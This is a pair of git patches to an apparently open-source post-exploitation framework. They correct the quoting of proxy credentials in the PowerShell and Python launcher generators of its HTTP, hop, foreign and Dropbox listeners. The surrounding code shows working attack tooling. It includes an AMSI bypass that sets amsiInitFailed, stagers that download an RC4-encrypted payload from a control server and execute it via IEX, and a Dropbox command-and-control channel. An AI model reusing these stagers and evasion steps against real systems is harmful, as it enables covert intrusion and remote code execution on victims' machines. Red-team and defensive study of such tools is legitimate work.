From 6f59ee7b34eb90af86cfa35b637efb1cc79e78f5 Mon Sep 17 00:00:00 2001 From: Dirkjan Mollema Date: Thu, 28 Sep 2017 16:53:11 +0200 Subject: [PATCH 1/2] Fixed custom proxy config in launcher code --- lib/listeners/http.py | 28 ++++++++++++++-------------- lib/listeners/http_foreign.py | 14 +++++++------- lib/listeners/http_hop.py | 8 ++++---- 3 files changed, 25 insertions(+), 25 deletions(-) diff --git a/lib/listeners/http.py b/lib/listeners/http.py index 5a1c4d1..d473beb 100644 --- a/lib/listeners/http.py +++ b/lib/listeners/http.py @@ -243,7 +243,7 @@ class Listener: password = proxyCreds.split(':')[1] domain = username.split('\\')[0] usr = username.split('\\')[1] - stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");" + stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');" stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;") #save the proxy settings to use during the entire staging process and the agent @@ -259,7 +259,7 @@ class Listener: if "https" in host: host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port) else: - host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port) + host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port) # code to turn the key string into a byte array stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(") @@ -291,7 +291,7 @@ class Listener: # decode everything and kick it over to IEX to kick off execution stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX") - + if obfuscate: stager = helpers.obfuscate(stager, obfuscationCommand=obfuscationCommand) # base64 encode the stager and return it @@ -333,7 +333,7 @@ class Listener: # prebuild the request routing packet for the launcher routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='') b64RoutingPacket = base64.b64encode(routingPacket) - + launcherBase += "req=urllib2.Request(server+t);\n" # add the RC4 packet to a cookie launcherBase += "req.add_header('User-Agent',UA);\n" @@ -347,7 +347,7 @@ class Listener: #launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue) launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue) - + if proxy.lower() != "none": if proxy.lower() == "default": launcherBase += "proxy = urllib2.ProxyHandler();\n" @@ -362,7 +362,7 @@ class Listener: launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n" username = proxyCreds.split(':')[0] password = proxyCreds.split(':')[1] - launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n" + launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n" launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n" else: launcherBase += "o = urllib2.build_opener(proxy);\n" @@ -373,7 +373,7 @@ class Listener: launcherBase += "urllib2.install_opener(o);\n" # download the stager and extract the IV - + launcherBase += "a=urllib2.urlopen(req).read();\n" launcherBase += "IV=a[0:4];" launcherBase += "data=a[4:];" @@ -414,8 +414,8 @@ class Listener: if not language: print helpers.color('[!] listeners/http generate_stager(): no language specified!') return None - - + + profile = listenerOptions['DefaultProfile']['Value'] uris = [a.strip('/') for a in profile.split('|')[0].split(',')] launcher = listenerOptions['Launcher']['Value'] @@ -470,7 +470,7 @@ class Listener: randomizedStager += helpers.randomize_capitalization(line) else: randomizedStager += line - + if obfuscate: randomizedStager = helpers.obfuscate(randomizedStager, obfuscationCommand=obfuscationCommand) # base64 encode the stager and return it @@ -633,7 +633,7 @@ class Listener: if($Script:Proxy) { $wc.Proxy = $Script:Proxy; } - + $wc.Headers.Add("User-Agent",$script:UserAgent) $script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)} $wc.Headers.Add("Cookie", "session=$RoutingCookie") @@ -675,7 +675,7 @@ class Listener: if($Script:Proxy) { $wc.Proxy = $Script:Proxy; } - + $wc.Headers.Add('User-Agent', $Script:UserAgent) $Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)} @@ -778,7 +778,7 @@ def send_message(packets=None): app = Flask(__name__) self.app = app - + @app.route('/') def send_stager(stagerURI): if stagerURI: @@ -982,4 +982,4 @@ def send_message(packets=None): self.threads[name].kill() else: print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])) - self.threads[self.options['Name']['Value']].kill() \ No newline at end of file + self.threads[self.options['Name']['Value']].kill() diff --git a/lib/listeners/http_foreign.py b/lib/listeners/http_foreign.py index c72fd6c..557626e 100644 --- a/lib/listeners/http_foreign.py +++ b/lib/listeners/http_foreign.py @@ -141,7 +141,7 @@ class Listener: uris = [a for a in profile.split('|')[0].split(',')] stage0 = random.choice(uris) customHeaders = profile.split('|')[2:] - + if language.startswith('po'): # PowerShell @@ -164,7 +164,7 @@ class Listener: stager += "'amsiInitFailed','NonPublic,Static'" stager += helpers.randomize_capitalization(").SetValue($null,$true)};") stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") - + stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;") if userAgent.lower() == 'default': @@ -198,7 +198,7 @@ class Listener: password = proxyCreds.split(':')[1] domain = username.split('\\')[0] usr = username.split('\\')[1] - stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");" + stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');" stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;") # TODO: reimplement stager retries? @@ -210,7 +210,7 @@ class Listener: headerValue = header.split(':')[1] stager += helpers.randomize_capitalization("$wc.Headers.Add(") stager += "\"%s\",\"%s\");" % (headerKey, headerValue) - + # code to turn the key string into a byte array stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(") stager += "'%s');" % (stagingKey) @@ -294,7 +294,7 @@ class Listener: launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n" username = proxyCreds.split(':')[0] password = proxyCreds.split(':')[1] - launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n" + launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n" launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n" else: launcherBase += "o = urllib2.build_opener(proxy);\n" @@ -363,12 +363,12 @@ class Listener: if language: if language.lower() == 'powershell': - + updateServers = """ $Script:ControlServers = @("%s"); $Script:ServerIndex = 0; """ % (listenerOptions['Host']['Value']) - + getTask = """ function script:Get-Task { diff --git a/lib/listeners/http_hop.py b/lib/listeners/http_hop.py index 21dbdc9..c5a7757 100644 --- a/lib/listeners/http_hop.py +++ b/lib/listeners/http_hop.py @@ -176,7 +176,7 @@ class Listener: password = proxyCreds.split(':')[1] domain = username.split('\\')[0] usr = username.split('\\')[1] - stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");" + stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');" stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;") # TODO: reimplement stager retries? @@ -247,7 +247,7 @@ class Listener: # add the RC4 packet to a cookie launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (b64RoutingPacket) launcherBase += "import urllib2\n" - + if proxy.lower() != "none": if proxy.lower() == "default": launcherBase += "proxy = urllib2.ProxyHandler();\n" @@ -262,7 +262,7 @@ class Listener: launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n" username = proxyCreds.split(':')[0] password = proxyCreds.split(':')[1] - launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n" + launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n" launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n" else: launcherBase += "o = urllib2.build_opener(proxy);\n" @@ -271,7 +271,7 @@ class Listener: #install proxy and creds globally, so they can be used with urlopen. launcherBase += "urllib2.install_opener(o);\n" - + # download the stager and extract the IV launcherBase += "a=o.open(server+t).read();" launcherBase += "IV=a[0:4];" From effe3954e1cf103c8882acad97bafce3cc92222b Mon Sep 17 00:00:00 2001 From: Dirkjan Mollema Date: Thu, 28 Sep 2017 17:11:32 +0200 Subject: [PATCH 2/2] Also fixed proxy in dbx.py --- lib/listeners/dbx.py | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/listeners/dbx.py b/lib/listeners/dbx.py index d0b644c..5bf5d73 100755 --- a/lib/listeners/dbx.py +++ b/lib/listeners/dbx.py @@ -222,7 +222,7 @@ class Listener: password = proxyCreds.split(':')[1] domain = username.split('\\')[0] usr = username.split('\\')[1] - stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");" + stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');" stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;") #save the proxy settings to use during the entire staging process and the agent @@ -307,7 +307,7 @@ class Listener: launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n" username = proxyCreds.split(':')[0] password = proxyCreds.split(':')[1] - launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n" + launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n" launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n" else: launcherBase += "o = urllib2.build_opener(proxy);\n" @@ -484,7 +484,7 @@ class Listener: #strip out comments and blank lines code = helpers.strip_python_comments(code) - #patch some more + #patch some more code = code.replace('delay = 60', 'delay = %s' % (delay)) code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter)) code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile)) @@ -661,16 +661,16 @@ def send_message(packets=None): except: pass - + if packets: data = ''.join(packets) # aes_encrypt_then_hmac is in stager.py encData = aes_encrypt_then_hmac(key, data) data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData) #check to see if there are any results already present - + headers['Dropbox-API-Arg'] = "{\\"path\\":\\"%s/%s.txt\\"}" % (resultsFolder, sessionID) - + try: pkdata = post_message('https://content.dropboxapi.com/2/files/download', data=None, headers=headers) except: @@ -953,7 +953,7 @@ def send_message(packets=None): dbx.files_delete(fileName) except dropbox.exceptions.ApiError: dispatcher.send("[!] Error deleting data at '%s'" % (fileName), sender="listeners/dropbox") - + self.mainMenu.agents.handle_agent_data(stagingKey, responseData, listenerOptions)